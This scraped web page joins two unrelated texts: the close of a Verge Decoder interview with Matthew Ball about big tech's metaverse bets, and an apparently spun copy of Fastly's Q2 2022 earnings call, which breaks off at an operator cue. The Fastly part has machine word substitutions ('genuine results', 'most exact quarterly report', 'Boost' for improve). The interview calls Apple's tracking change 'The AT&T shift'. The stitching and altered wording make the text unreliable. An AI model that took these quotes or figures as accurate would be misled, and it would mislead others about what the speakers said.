One of the challenges Facebook has in particular is that the economy is slowing down. Apple’s ad changes have had huge effects on Facebook’s revenue. They are trying to manage this big pivot and this bet on the future. People might buy fewer Quest consoles, and they are investing less in future hardware. Do you think they are going to be able to make it through?

The AT&T shift from Apple is particularly brutal. The estimated cost of that is $10 billion in operating cash flow in 2022. That happens to be exactly what Facebook Reality Labs was spending on their many projects, the various XR devices, the wearables, their operating system, and the Horizon Worlds platform. Anyone finding out that they are going to have $10 billion less in cash flow is going to have to trim budgets, especially in special projects with limited revenue and probably a negative 80 percent gross margin overall.

I think the biggest challenge — one that Mark has consistently underestimated, it seems — is that the timeline for those new devices, that would allow him to get out from the hegemony of Apple and Google, is probably farther out than was ever imagined.

2015 was the first time Mark said publicly that they imagined by the end of the decade, last decade, wearable headsets would replace the smartphone. They have reiterated that this decade, but as you and your colleagues have reported, they have now delayed the first edition three times. We may not see consumer AR hardware until 2025 or 2026, and he has called it the hardest technological challenge of our era, putting a supercomputer into lightweight wearables.

If that is their biggest opportunity to have hardware, to have their own operating system, and they are already sitting behind when it comes to what I call integrated virtual world platforms — Horizon versus Roblox or Fortnite Creative Mode — and they are simultaneously experiencing decline, not necessarily secular, of the core business, the timing starts to feel tight.

You said that it is the hardest technological challenge. I always think about it as a stack of problems, especially for AR glasses. You need a camera that can see the world around you in sufficient fidelity. That has to go to a processor that can interpret that data and spit out something good to put over top of it to augment reality. You need a battery that can power that processor and that camera. You almost certainly need persistent connectivity. Then most importantly, you need a display solution that actually works, which does not exist yet. Do you think Facebook is on the road to solving any or all of those problems?

I would add two more problems. It has to actually fit and weigh little enough that you are comfortable wearing it, and it has to not melt your face while you do it. Every single thing that you just mentioned trades off with one another. You want another two sensors that are good for UIX, it drains the battery and the GPU power, increasing the cost and the form factor, generating more heat.

Put another way, we take for granted that today’s most computationally powerful consumer devices, consoles, really just need to manage for a few constraints. The size, not really; the new PlayStations are four times bigger than the first PlayStation. They do not need to manage the battery, as they have constant access to power. They can put fans in there so that the overheating problem is not that bad. And they know that the build of materials has to cost between $400 and $700. When you are talking about these devices, you have several new problems: size, heat, you cannot have a fan, you need battery power, and the GPUs are smaller. All of the other things get harder despite that.

We see that Facebook is investing in its own semis and you are right, it’s the stack. All of these things need to be solved. We know that Apple is planning up to 12 or 14 cameras. I think the current Oculus has 6. Well, maybe you do need 12 or 14. Every time you put another pair in there, you are going to find that the GPU you thought was going to power experience X just cannot. It is incredibly hard.

I think that set of challenges is very difficult for Facebook. When we talk about hardware, we have to go to Apple next, which is very good at hardware. They are very good at performance chips that run a long time on batteries. There are lots of rumors about Apple’s headset out there.

But they are pretty bad at ecosystems and playing nice with others, and with interoperability. As you have mentioned with their ad tracking stuff, they are pretty good at locking things down. They are good at preventing innovation from taking place; game streaming does not exist the way it could because Apple will not allow it on their platforms. OpenSea cannot transact NFTs because they would have to pay Apple a 30 percent cut. How do you think Apple is doing?

One thing that is fun to put on the side of this is that six days before Epic Games sued Apple, Tim Sweeney, the founder and CEO, tweeted out that Apple had outlawed the metaverse. His point was exactly the cloud gaming one. I cite The Verge a few times in there with these fun quotes that basically say, “Arguing about what Apple does or does not allow is irrelevant because they can change the rules any time they want.”

The Apple constraint here is really profound. They have incredible hard, soft, and often accidental power, and they do work hard to prevent many standards and solutions coming into place.

You just teed up my favorite example, which is what happens with NFTs. Let’s keep in mind that they allow you to buy fungible tokens, ETH, on Coinbase, but you cannot buy a non-fungible token, an NFT, on Coinbase. If you choose to fractionalize an NFT into a billion fungible tokens — you could actually increase it so that there are more fractionalized tokens than there are Bitcoin tokens — that is still not allowed, even though you might own one trillionth of an NFT.

This just reflects the extent to which they are contending with not just business model disruption, but control of their own ecosystem. Outlawing is not wrong, but I think we will see how that turns out. When it comes to new hardware, it is obvious. If AR and VR are going to be things, Apple will be at least a player, but it is more likely that they have the most performance, best-looking, lightest weight, and preferred early additions. The advantages there, especially at scale and cost — development cost or production cost — are simple.

In the book you have a section about how the metaverse need not actually take place in headsets. It could be expressed in all kinds of ways. As we talk about these companies, their metaverse bets are very much headsets.

Facebook wants to be first to headsets at scale, because then they can just leave the iPhone and the complications of Apple’s platform behind. Apple does not want to have the iPhone disrupted, so they are racing towards a headset. I think Tim Cook wants to shift the AR headset as his last big reveal before he moves on in 10 years. Right now, to do a non-headset metaverse, you are kind of stuck behind whatever Apple will allow, because they are the most pervasive computing platform that exists.

That is quite right.

Is there a way around that? Do we just hope Amy Klobuchar can find the votes for her anti-trust bill, or is there a business model or industry solution that solves that?

This is where we get into some of the interesting answers. Is there a way around it? Are there alternatives? Yes and no.

Cloud gaming is a potential answer, but we should keep in mind exactly how many ways Apple stymies them. It probably works 95 percent of the time for 40 percent of users. That is not a good technical solution for a social platform, but it can work. Doing it from the browser is not a great experience. Apple, for security reasons, valid and not valid, also constrains your ability to send notifications. That is not great if I am trying to tell you to log onto Fortnite. First of all, you cannot have an app, and secondly, you don’t ever get the notification.

The other way to do it is browser-based rendering, but Apple has historically constrained WebGL, so the non-application alternative of using a browser, what they call the open web, doesn’t really work. The way in which Apple constrains WebGL is because Safari does not support it comprehensively, whereas I can obtain Chrome for iOS, and I am really just using the Chrome wrapper on the Safari engine. Their technical decisions for Safari mean what Google can and cannot do is inherited, and the app stores hegemony over software means that I cannot obtain true Chrome.

We are finding out this is why Tim sued Apple. He says that Apple has outlawed the metaverse rather than gotten in its way. A properly motivated Apple can effectively stymie most things. There is a reason why Web3 games are either based on non-real-time collecting and trading, or really primitive browser-based games, like Axie Infinity visually. You cannot pull off complex rendering without most of WebGL or a native app, and Apple will not allow it.

You mention the open web, which means we should talk about Google next. Google is Google. They have multiple competing projects. They have just restructured some things, and they have announced some little things. Are they a player?

That is a great question. Google has spent quite some time focused here. Google Glass was a famous disaster, but they have released another two versions of Google Glass, or enterprise editions. They made a billion-dollar acquisition last year, a $200 million acquisition the year before. Clay Bavor, an SVP in charge of essentially all special projects, plus AR and VR, and has been for some years, was realigned to directly report to Sundar.

It is clear that they are focused here. The problems have always been that their software is never considered best for consumer applications, their hardware has never really taken off, and their efforts in gaming have barely been funded. Many of their best potential plays, Niantic and others, were divested, spun off, or allowed to competitors.

If Android is and remains the most used ecosystem globally — it is the second highest revenue-generating games platform globally — they are likely to benefit, but the big opportunities with new hardware, a virtual world platform, or managing the standards, all seem tough. Even when you take a look at Google Cloud, it is estimated to be losing $5 or $6 billion per year. AWS has more profit than Google Cloud does in revenue. Even with the tangential argument that increased computing power is going to be good for Google, their business currently loses money every time a new server gets stood up. They are harder to see.

You mentioned AWS, so let’s keep going down the list. Amazon has some pretensions here, in the sense that they have a big hardware division that invents a bunch of stuff all the time. They have the most pervasive voice assistant, which I think is an interesting side light into the idea of a secondary world that you can interact with in different ways. Are they a player? Do you see them making an investment?

I would guess that they are number one in virtual assistant hardware, but I would also guess that Siri and Google Assistant are the most-used virtual assistants. They have the other benefit of having the device everywhere; mobile is better tailored.

Amazon is really interesting. The computing and data center business is going to be an extraordinary beneficiary. How much that moves into value-added services in machine learning and others has yet to be known. Snowflake is a good example of other companies building value-added services on top of the pure racks.

The bigger challenge is one I find really interesting. Amazon has spent a lot of time focused on more traditional media categories than it has in gaming or interactive, even though the latter seems a lot closer to their core business on the AWS side, and their success rate has been mixed. Jason Schreier at Bloomberg has estimated billions were spent into Lumberyard, their game engine. That was given over to the Linux Foundation earlier this year. Luna, their cloud gaming service, seems to have had less of an impact than Google Stadia did.

That is a very quiet burn. I just want to put that out there.

There is a good question of whether or not it is a quiet burn because they have been a lot quieter as well. Part of the problem that doomed Stadia was much bigger and more public ambitions, and much greater out-of-the-gate spend. Amazon is best in the world at the slow burn strategy and they remain committed to it, though I have not seen any big leaps.

While Amazon Game Studio has had some success with New World and others more recently, it is operating as the publisher. They are not developing the titles themselves, and they are not using AWS in an innovative or new way. As you take a look at Amazon’s interactive business, they have rewritten many job descriptions to focus on the metaverse in name. They are a big proponent of the Unreal ecosystem. They are trying to advance certain standards. But externally a lot of it still feels like more potential and conjecture than it is, as yet, a product.

I want to ask about two more here. Microsoft CEO Satya Nadella has said the metaverse is already here, so he is buying Activision and the Xbox seems to be growing. They just keep buying everything, but they do not have great hardware. The HoloLens is not a huge success; they just shuffled that team and fired Alex Kipman, who was in charge of the HoloLens. Are they on track, or are they just going to be a horizontal software provider, which has been an enormously successful strategy for them as you pointed out?

I talk about this quite a bit in the book. There is this fascinating aspect in which the company has absolutely thrived under Satya by becoming horizontal, shedding the stack requirement and rich vertical integration.

But when Satya took over, the games business was being called on for divestment. Yet the first acquisition he did was of Minecraft. He did something really unique at the time; he committed to keeping it fully horizontal, available on all platforms, not exclusive to Xbox, and keeping it agnostic to the end point, not even preferring Xbox hardware.

It was about five or six years before he did another large acquisition, that of LinkedIn. Then you have Activision Blizzard, the most expensive big-tech acquisition in history, at $75 billion. In the opening graph, the last line, he says, “It is for the foundations of the metaverse.”

In many ways, Minecraft presaged everything that he was going to do with the strategy at large, and they have been very focused here. The number of different pieces they have is actually really exciting. I talk about Microsoft Flight Simulator as perhaps the most technically impressive consumer-deployed, persistent live digital twin or metaverse-style experience that any of us can do.

This is a company where, putting aside the fact they were public about the metaverse before Facebook was, it feels like execution of bringing the pieces together — which is the same for Google and Amazon, but less clear — could be extraordinary for them. I think that is why you have always seen this commitment, and why he is so quick to bet FTC scrutiny, DOJ scrutiny, and $75 billion to build it.

I could keep doing companies forever. It’s a fun game, but I want to actually end on the regulatory scrutiny piece.

This space is unregulated, in a way that if you make the comparison to the early internet, it is very different. The early internet was a government project. There was the idea that we would keep regulators away from it. Even that decision to keep regulators away is, itself, a regulatory decision, and then you had all of the public investment into the internet around the world.

That is not happening here, right? This is all a purely private company kind of investment. Regulators seem like they have no idea what to do here, in the same way that even regulators have no idea what to do with crypto, but they have a lot of ideas. Here it is just silence. Where do you think that comes into play? Where do you think the government comes into play here with the metaverse?

The interesting thing about regulators leaving their hands off the internet is, of course, that the internet came from government. Many of its foundational bodies, the internet engineering task force that stewards most of TCP/IP, was developed by DOD and then relinquished, but is still strongly influenced by government. One of the reasons why governments left it was because there were pretty strong and important self-regulating bodies that worked together effectively that they had helped to create.

You are right that we do not see this here, but I actually think it is changing pretty quickly. Yesterday the EU released their Think Tank’s Policy Memorandum. The chief negotiator of the EU for the Digital Services Act has been very critical and very vocal about what they need. The South Korean government has established the South Korean Metaverse Alliance, an effectively required body that is also effectively mandating national standards.

Their perspective seems to be that the standards group will force things that many do not want and are individually disadvantaged by, but to the national benefit. Of course in China, which is a whole other issue, I do not think it is a coincidence that just after Tencent unveiled its Hyper Digital Reality vision — which is their essential trademark for the metaverse — they began the biggest ever crackdown of the space.

I think the US is probably the furthest behind, in at least formal recommendations. I think that in many territories — Southeast Asia, China, and the EU — governments seem very focused on this now in a way that surprises and inspires me. The fact that it coincides with regulation designed to fix the problems of the past 15 years raises the specter of accidental damage to an area that does not really exist yet. I am more hopeful that it actually sets us on a clearer path, rather than 15 years of catch-up.

Let’s end with a look to the future. I think one of the things that you and I would both agree on is that this is not going to be a light switch. The metaverse is not going to just turn on one day; it is going to happen to us slowly over time. I am curious. In that big picture, what is the sign post for you that the metaverse is more likely than not, or that it has arrived in a real way? What would be the indicator for you?

The indicator that I would pay attention to is the early demographic transition. Seventy-five percent of those ages 9 to 12 in most Western markets use Roblox, and just Roblox, on a regular basis. That is not to say that they do not use other things. We know fundamentally that Gen Y games more than Gen X, Gen Z more than Gen Y, and Gen A more than Gen Z, and that trend is not turning around.

I think the big things that I am getting excited about are the industrial applications, the deployment in what we call ACE — architecture, construction, and engineering. The challenge with those is that lead times are long. You have to convince businesses to use new technology to solve problems they are not used to solving. They have to then deploy them, and they have to get good at using them. They need to start to share with the city and with other partners.

Once we actually find a way to make development of the real world more productive, to live-operate businesses and infrastructure together — which can be as simple as lighting systems in a smart city with proper civil engineering — that is what gets exciting to me.

Matt, this has been incredible. I could keep going for another hour. Thank you so much for being on Decoder.

Thank you.

Mon, 18 Jul 2022 23:00:00 -0500 en text/html https://www.theverge.com/23269170/what-is-the-metaverse-matthew-ball-interview-decoder-podcast
Killexams : Fastly, Inc. (FSLY) CEO Joshua Bixby on Q2 2022 Results - Earnings Call Transcript

Fastly, Inc. (NYSE:FSLY) Q2 2022 Earnings Conference Call August 3, 2022 5:00 PM ET

Company Participants

Vernon Essi - Investor Relations

David Hornik - Lead Independent Director

Joshua Bixby - Chief Executive Officer

Ron Kisling - Chief Financial Officer

Conference Call Participants

Frank Louthan - Raymond James

Rudy Kessinger - D.A. Davidson

Quinton Gabrielli - Piper Sandler

Charlie Erlikh - Baird

Philip Rigby - RBC Capital Markets

Tom Blakey - KeyBanc

Operator

Ladies and gentlemen, thank you for standing by. At this time, I would like to welcome everyone to the Fastly Second Quarter 2022 Earnings Conference Call. [Operator Instructions] Thank you. I would now like to turn the conference over to Vernon Essi, Investor Relations at Fastly. Please go ahead.

Vernon Essi

Thank you and welcome everyone to our second quarter 2022 earnings conference call. We have Fastly’s Lead Independent Director, David Hornik; our CEO, Joshua Bixby; and our CFO, Ron Kisling, with us today. Webcast of this call can be accessed through our website, fastly.com and will be archived for 1 year. Also, a replay will be available by dialing 800-770-2030 and referencing conference ID number 754-3239 shortly after the conclusion of today’s call. A copy of today’s earnings press release, related financial tables and investor supplement all of which are furnished in our 8-K filing today can be found in the Investor Relations portion of Fastly’s website.

During this call, we will make forward-looking statements, including statements related to the expected performance of our business, future financial results, strategy, long-term growth and overall future prospects. These statements are subject to known and unknown risks, uncertainties and assumptions that could cause genuine results to differ materially from those projected or implied during the call. For further information regarding risk factors for our business, please refer to our most exact quarterly report 10-Q filed with the SEC and our second quarter 2022 earnings release and supplement for a discussion of the factors that could cause our results to differ. Please refer in particular to the sections entitled Risk Factors. We encourage you to read these documents.

Also note that the forward-looking statements on this call are based on information available to us as of today’s date. We undertake no obligation to update any forward-looking statements, except as required by law. Also during this call, we will discuss certain non-GAAP financial measures. Unless otherwise noted, all numbers we discuss today other than revenue will be on an adjusted non-GAAP basis. Reconciliations to the most directly comparable GAAP financial measures are provided in the earnings release and supplement on our Investor Relations website. These non-GAAP measures are not intended to be a substitute for our GAAP results.

Before we begin our prepared comments, please note that we will be attending two conferences in the third quarter, the KeyBanc Technology Leadership Forum in Colorado on August 9 and Citi’s 2022 Global Technology Conference in New York on September 7.

With that, I will turn the call over to David for his comments regarding today’s announcement of our new CEO, Todd Nightingale. David?

David Hornik

Thanks, Vern. Hi, everyone and thank you for joining us today. As you may have seen from the press release we issued this afternoon, I am thrilled to share that after a broad and extensive search to identify the company’s next leader, Todd Nightingale has been appointed our next Chief Executive Officer of Fastly. Fastly’s large enterprise customer base, robust product roadmap and unrivaled customer satisfaction gives us confidence about Fastly’s future and the significant opportunities ahead. As we search for the company’s next leader, the Board was committed to finding a candidate that could help build upon Fastly’s strong foundation and lead it into the next stage of growth.

The Board is confident that Todd’s customer-oriented leadership style and extensive background helping customers transform their infrastructure and digitize their businesses will greatly benefit Fastly and position the company for future success. Hailing from Cisco, where he currently serves as Executive Vice President and General Manager of Enterprise Networking and Cloud, Todd is a proven and passionate technology leader. Todd understands that now more than ever, enterprises need innovative solutions that enable them to deliver globally performing, secure and reliable applications to their customers. He will officially join us as CEO on September 1 and Joshua will remain with the company for a period of time to ensure a smooth and successful transition.

Please note that at this time, we won’t be addressing any questions regarding Todd’s appointment during today’s Q&A, but we’ll plan to share more information after it’s started.

With that, I’ll turn the call over to Joshua.

Joshua Bixby

Thank you, David. Hi, everyone and thanks for joining us today. Today, I will talk about the quarter and then we will invite Ron to provide some more color on this quarter’s results. Then we will take some questions, which, as David indicated, we ask that you focus on the results and the outlook.

In the second quarter 2022, we reported revenue of $102.5 million, representing flat sequential growth and 21% growth year-over-year. These results exceeded the top end of our guidance range of $99 million to $102 million and represent another record revenue quarter. Our customer retention and growth engine remains strong. Our LTM NRR was 117%, and our DBNER was 120% in the second quarter. Our average enterprise customer spend was $730,000, representing a 1% quarter-over-quarter increase.

Our total customer count in the second quarter was 2,894 of which 471 were enterprise customers. Our total customer count increased by 14 in Q2, down from 76 in Q1. Our total customer count was impacted by higher churn at the low end of our customer base, which we believe was impacted by the uncertain macro environment impacting smaller customers and the dynamics we have described before in which small customers opt for our more robust developer-friendly trials.

We continue to focus on landing new enterprise and large customers. For example, in the second quarter, the average monthly revenue run rate of the new customers we added to the platform was 85% higher than those that churned. In terms of developer traction, we added over 100,000 developers to our platform across Glitch and our Compute@Edge platform and we are pleased to see so many new developers experimenting with us. It is encouraging to see our enterprise customer count increased by 14 compared to 12 in the first quarter. This increase in enterprise customers validates our efforts in sales and marketing to retain and expand our customers’ revenue, particularly focused on larger customers. This was the case with 2 Fortune 500 customers, one, a leading CRM company with world-class enterprise customers and the other a global digital payments juggernaut. Both customers expanded their use of Fastly across multiple product lines in the second quarter.

You may have seen the announcement last week that Fastly is now an official global sponsor of the Mercedes AMG Petronas Formula One team. This long-term partnership reflects our shared commitment to experiences that are fast, safe and leading edge, both on the track and on the Internet. You will be hearing more about this growing relationship on the track and on our platform in the coming quarters.

As we discussed in detail last quarter, one of the key initiatives we have undertaken in 2022 is the deployment of our new architecture for key metro regions. As previously discussed, we believe we will achieve material gross margin leverage by doubling down our efforts on server efficiency with this new architecture, which is coupled to our proprietary software development. As discussed previously, we have been running duplicate sites, which is a gross margin headwind. However, our gross margin in the second quarter was further adversely impacted primarily by onetime cost true-ups and other smaller items. Ron will provide more details in his section as well as our strategic initiatives at reducing supply chain risks and carrying costs on our infrastructure CapEx. Our gross margin declines are an area of focus, and we remain committed to taking the necessary steps to see this improve. Like last quarter, the pricing dynamics in the business have not materially changed and have not been a major contributor to our exact decline.

The team at Fastly remains united in our common mission, which is to fuel the next modern digital experience by providing developers with a programmable, secure and reliable edge cloud network that they adopt as their own. Central to this common mission is the key role developers play in our journey and the new and expanding power of distributed edge compute and security. As they use our trusted platform, they become more interested in its features and that keeps them engaged and retained as customers as they scale.

To reinforce this effort, we have acquired Glitch, announced on the heels of our Q1 results, a platform of 1.8 million developers, bringing together two of the world’s best ecosystems for application development into a single seamless developer experience to deliver globally performance, secure and reliable applications at scale. Now developers can innovate, create and share full stack web apps without having to run the infrastructure or manage tools themselves. We are very excited about Glitch as it provides a giant leap forward in our developer relations efforts.

We are also building partner momentum to broaden and deepen our developer reach. As you may have seen last week, we announced a reseller partnership with HUMAN to resell their industry-leading bot detection to help security and fraud teams keep cybercriminals out of their online applications and services. Using superior detection methods, hacker intelligence and collective protection across the web, HUMAN detects and defeats bot attacks and fraud with unmatched scale, speed and precision. Now customers can get all the benefits of Fastly’s next-gen WAF, the first and only unified WAF solution with HUMAN’s exceptional bot protection management capabilities. In the coming quarters, we will continue to expand our roster of partners to expand the scope and reach of our platform.

Moving on to our product highlights for the second quarter. Our delivery products, which are part of our network services portfolio continued to receive strong market validation. Fastly was recognized as a customer choice in the 2022 Gartner Peer Insights Voice of the Customer Global CDN. Fastly received the highest customer rating of 4.8 out of 5 stars and the highest customer willingness to recommend at 97%. We earn recognition due to our network size and scale, developer focus, web security and customer support. Positive customer sentiment continues to lead to significant up-sells with our largest customers. For example, in the second quarter, a leading social media platform with over 50 million daily active users chose to expand our relationship with additional products after undertaking a competitive RFP process.

We continue to accelerate Fastly’s product delivery. In the second quarter, we had 14 releases in total compared to 11 releases in the first quarter. Observability has been a top priority in 2022, and we announced general availability of both Origin Inspector and Domain Inspector, which both can be self-enabled straight from the Fastly UI. For companies using a single origin, multi-cloud or multi-CDN architecture, Origin Inspector unlocks end-to-end visibility of Internet traffic traveling from the origin to the Fastly edge cloud. Domain Inspector allows our customers to effortlessly monitor traffic for a single fully qualified domain name or multiple domains assigned to a Fastly service.

On the security front, we had several new developments. Fastly’s next-gen WAF edge deployment is now in general availability. Given the rise of new threats in late 2021 and into early 2022, such as Log4J and Spring Shell, we added new APIs for deprovisioning, improved origin sinking and now support the percentage ramp-up feature to control the amount of traffic through the edge security service. Our delivery customers are easily migrating to our expanded security offering. In the second quarter, an online discovery platform serving over 300 billion content recommendations monthly extended its Fastly edge delivery needs with the Next-Gen WAF product.

Along with Fastly’s next-gen WAF, we added CBE signals, allowing virtual patching functionality to be configured through a web interface. We introduced Fastly Security Labs, a new program that empowers customers to be the first to test new detection and security features directly to the security product team, bolstering the quality of our Next-Gen WAF. We also added features to our image Optimizer, and we added JavaScript SDK to Compute@Edge supported languages. Compute@Edge continues to be critical in winning new business. For example, a Japanese e-commerce marketplace, chose Fastly specifically because of our JavaScript support in a competitive deal for Compute@Edge that did not include delivery. Our continued strong execution on the product and engineering front is very exciting, and our significant increase in release velocity reinforces our commitment to developers and platform builders.

Underpinning all of our technology is our lightning fast network. We continue to remain consistently faster than our peers in the U.S. and Europe, even surpassing some of our toughest critics and customers’ expectations. This performance advantage validates our unique architecture, and we are continuing to invest in this development to fuel growth. Performance paired with security is one of the most critical decision-making metrics for our customers. That is why we are excited and proud to be part of Apple’s new iCloud private relay service that’s designed to protect users’ privacy on the Internet. And we’re also collaborating with Apple, Google and others to develop and standardize the technology behind private access tokens to provide secure anonymity to end users.

I will close out by saying that working closely with world class customers like Apple is further validation of Fastly’s technology and platform solution, and we look forward to further opportunities to collaborate with industry leaders.

To discuss the financial details of the quarter and guidance, I now turn the call over to Ron. Ron?

Ron Kisling

Thank you, Joshua and thanks everyone for joining us. Today, I will discuss our business metrics and financial results and then review our forward guidance. Note that unless otherwise stated, all financial results in my discussion are non-GAAP-based metrics.

Total revenue for the second quarter increased 21% year-over-year to $102.5 million, exceeding the top end of our guidance of $99 million to $102 million. In the second quarter, revenue from Signal Sciences products was 13% of revenue, a 56% year-over-year increase or 41% increase after purchase price adjustments related to deferred revenue are reflected.

While we are not immune to the macroeconomic trends, we are seeing healthy traffic expansion from our enterprise customers and given our relatively smaller market share, we are benefiting from share gains in an otherwise challenging environment. Our dollar-based net expansion rate, or DBNER, was 120%, up slightly from 118% in Q1, and our trailing 12-month net retention rate was 117% up slightly from 115% in the prior quarter. We continue to experience very low churn of less than 1%, and our customer retention dynamics remain strong.

As Joshua stated, we had 2,894 customers at the end of Q2, of which 471 were classified as enterprise, those customers with an excess of $100,000 of revenue over the previous 12 months. Enterprise customers accounted for 88% of total revenue on a trailing 12-month basis, down slightly from their 89% contribution in Q1 and increased their average spend to $730,000 from $722,000 in the previous quarter, demonstrating our continued ability to expand our business within our largest customers and our strong customer retention. Our top 10 customers comprised 34% of our total revenues in the second quarter of 2022, in line with their contribution in the first quarter of 2022.

Before I begin a detailed discussion of our financial performance, let me step back and take a moment to discuss the changes taking place within Fastly’s financial organization. As we have discussed, since I joined Fastly 1 year ago, we have been in the process of transforming our financial team, our operations and the management of our balance sheet. This has resulted in several changes that we believe will not only strengthen Fastly’s financial position longer term but also Boost faster competitive positioning and its transparency to the investor community.

Let me briefly discuss these improvements. First, we used our strong cash balance to repurchase approximately $235 million of the principal amount of our convertible debt at a 25% discount to its principal value resulting in a $54 million gain on this repurchase. Secondly, we made advanced payments for capital hardware of $29.3 million to suppliers on purchase commitments we had made in early 2021 to reduce our exposure to supply chain constraints. These advanced payments will reduce carrying costs by over $1 million over the next 12 months depending on our deployment schedule of the committed equipment. Third, we have improved our capacity planning process with better forecasting and cross-functional reviews to better align capacity investments with expected traffic levels. We believe this will result in improved gross margins in the medium to long term. In addition, we now expect our cash CapEx for 2022, which includes purchases of PP&E and capitalized internal use software and excludes advanced payments for PP&E and repayments of finance leases to decline to a range of 10% to 12% and from our previously expected range of 12% to 14%.

Fourth, we have improved our controls around cost of revenues and made adjustments to our accounting for free developer and charitable organization accounts and recorded a onetime Q1 true-up to our cost of revenues of approximately 160 basis points in the second quarter. And lastly, for the second half, we have put in place additional controls around hiring and non-headcount spending. As we previously shared, our expenses in 2022 were weighted to the first half of the year. And with these adjustments, we expect second half operating expenses to decline as compared to the first half. In addition, as we improved our cost controls, we experienced some onetime true-up of costs in the second quarter, primarily in sales and marketing.

I will now turn to the rest of our financial results for the second quarter. Our gross margin was 50.4% for the second quarter compared to 52.6% in the first quarter of 2022. This gross margin is below the flattish sequential level we anticipated during our last quarterly earnings call. This is primarily due to a onetime true-up to our cost of revenue I discussed above as well as other smaller onetime items that, had they not occurred, would have led to an approximate decline of only 50 basis points sequentially. We realized the optics of this gross margin trend are unfavorable and I want to confirm that we did not see any meaningful decrease in our pricing in Q2 compared to the first quarter. And our prior discussion on our network investments in the next-generation architecture remains intact, and we expect gross margin improvement in the second half. We continue to expect gross margin to increase meaningfully for the remainder of 2022 towards the low to mid-50s.

Operating expenses were $78.6 million in the second quarter, up 18% over Q2 2021 due to increased headcount across the organization, higher-than-expected salary increases, an acceleration in T&E expenses, increased investment in product and go-to-market activities, and as I previously mentioned, certain one-time expense items. We experienced several one-time expense items in Q2, primarily in sales and marketing that we do not expect to repeat in the second half of 2022. A little over half of the quarter-to-quarter increase in OpEx was due to one-time expense items in the quarter.

While we now anticipate operating expenses for 2022 to be higher than we planned at the beginning of the year, as we previously stated, we still expect expenses to be lower in the second half as compared to the first half. Our operating loss for the quarter was $26.9 million, and our net loss was $28 million or a $0.23 loss per basic and diluted share compared to an operating loss of $17.6 million, a net loss of $17.4 million and a $0.15 loss per basic and diluted share in Q2 2021.

Turning to the balance sheet, we ended the quarter with approximately $767 million in cash, cash equivalents, marketable securities and investments, including those classified as long term. During the quarter, we repurchased $235 million in aggregate principal amount of our convertible debt for $176.4 million or $0.75 on the dollar before related fees and transaction costs, reducing our debt balance to $703 million from $934 million. We will continue to use our balance sheet strategically to capitalize on low-risk opportunities that arise in the capital markets during these volatile periods.

Our free cash flow reflects the impact of the advanced payments on capital equipment commitments of $29.3 million, capital expenditures of $15 million, which include cash purchases of capital equipment, capitalized internal use software and payments on finance leases in the quarter, resulting in the decrease in free cash flow to negative $61 million. Our cash capital expenditures were 11% of revenue in the second quarter, and our capital expenditures include capitalized software. This, along with our foundational technology drives efficiency and leverage in our network which is a competitive differentiator.

We previously shared that we made commitments for future equipment needs in early 2021 in response to supply chain challenges. As I discussed previously, as part of these commitments, we made advanced payments of $29.3 million in the second quarter, and we will be making additional advanced payments of approximately $16 million over the next three quarters to secure availability of this equipment and reduce ongoing carrying cost fees from these vendors.

We expect to take delivery of equipment covered by these commitments and deploy it over the remainder of 2022 and 2023. These payments will favorably impact our gross margin by reducing carrying costs and we do not incur any operating costs, including depreciation until we deploy this equipment. And despite our transition to our next-generation network architecture and acceleration of some investments due to supply chain constraints. As I previously discussed, with the benefits from our improved capacity planning processes, we now expect our cash capital expenditures in 2022 to decline to a range of 10% to 12% of revenue from our previously expected range of 12% to 14%.

I will now turn to discuss the outlook for the third quarter and full year 2022. I’d like to remind everyone again that the following statements are based on current expectations as of today and include forward-looking statements. genuine results may differ materially, and we undertake no obligation to update these forward-looking statements in the future, except as required by law.

Our third quarter and full year 2022 outlook reflects our continued ability to deliver strong top line growth via improved customer acquisition and expansion within our enterprise customers, driven in part by new and enhanced products. Our revenue guidance is based on the visibility that we have today and given our usage-based business model, we expect to gain additional visibility to our annual guidance as the year progresses.

Historically, our first and second quarter revenues are generally flat with revenues increasing in the second half of the year. As a result, for the third quarter, we expect revenue in the range of $102 million to $105 million, representing 19% annual growth at the midpoint. We expect a non-GAAP operating loss of $21.5 million to $18.5 million and a non-GAAP loss per share of $0.18 to $0.15.

For the full year 2022, we are increasing our prior revenue guidance by $10 million to a range of $415 million to $425 million, representing 19% annual growth at the midpoint. We expect a non-GAAP operating loss of $78 million to $72 million and a non-GAAP net loss of $0.68 to $0.63 per share, reflecting the impact from lower gross margins and higher expenses I discussed previously. And to reiterate, we anticipate gross margins to Boost in the second half of 2022.

Before we open the line for questions, we would like to thank you for your interest and your support in Fastly. Operator?

Question-and-Answer Session

Operator

[Operator Instructions] Your first question comes from the line of Frank Louthan with Raymond James. Your line is open.

Frank Louthan

Great. Thank you. So just to be clear on the gross margins, if you – adding back the charge you took, it would have been more like 46.5%, is that correct? And then I missed what you said the back half would be and does this mean that the upgrade you are doing there is finished and the back half is sort of the full benefit of that or can we still expect gross margins to ramp going into ‘23? Thank you.

Ron Kisling

Yes, this is Ron. Couple of things. On gross margin, if you back out kind of the one-time activities or adjustments, as we said, we would have been about 50 basis points below where we sort of guided, which was flat. So that would work out on a non-GAAP basis to be around 52% gross margins in the quarter, ignoring the one-time cost. As for the technology migration at our largest sites that is on track and is one of the drivers in the second half for improved gross margins as we are decommissioning the redundant sites that we put in place as we made this technology migration.

Frank Louthan

Okay, great. Thank you. And can you walk us through the acquisition and just how you expect that to boost your other offerings in the space? Thanks.

Joshua Bixby

Sure. Hey, Frank, it’s Joshua here. I think as we’ve said all along, as a platform for platform builders and as an organization that really supports developers, that journey doesn’t just start when you are ready as an enterprise to adopt the technology. We have known for the lifetime of our business that that journey starts when you start experimenting. When you have a problem at 2 o'clock in the morning that you can’t sleep and you are trying to solve, developers will wake up and they will try to solve problems. And so for us, the Glitch acquisition is incredibly important, because it continues that journey, actually drives that journey earlier into the developer lifecycle. Glitch is a tool that, as we said, is used by 1 million plus developers who are out there solving problems. And really what Compute@Edge is designed for us to solve problems for these people who build platforms and who are delivering platform. So we see it as being very important on the sales journey and not only that developer moment of inspiration, but that carries through the entire enterprise cycle. So, we believe it’s going to serve two main purposes, obviously, on the revenue side. But the other thing, when you get so many people experimenting with the tools, you actually start to find new use cases. And the innovation of the community starts to become part of that innovation cycle. And one of the things that you’ve seen from the business over the last few quarters, and really highlighted this quarter is we are delivering – there is 14 important releases. Our – we are accelerating. We are getting faster. And I’m really proud of the team for doing that. And when we look at a community of millions of people experimenting, that only accelerates that. So I think it really helps in both areas of the business. It’s very exciting.

Frank Louthan

Alright. Great. Thank you very much.

Joshua Bixby

Thanks, Frank.

Operator

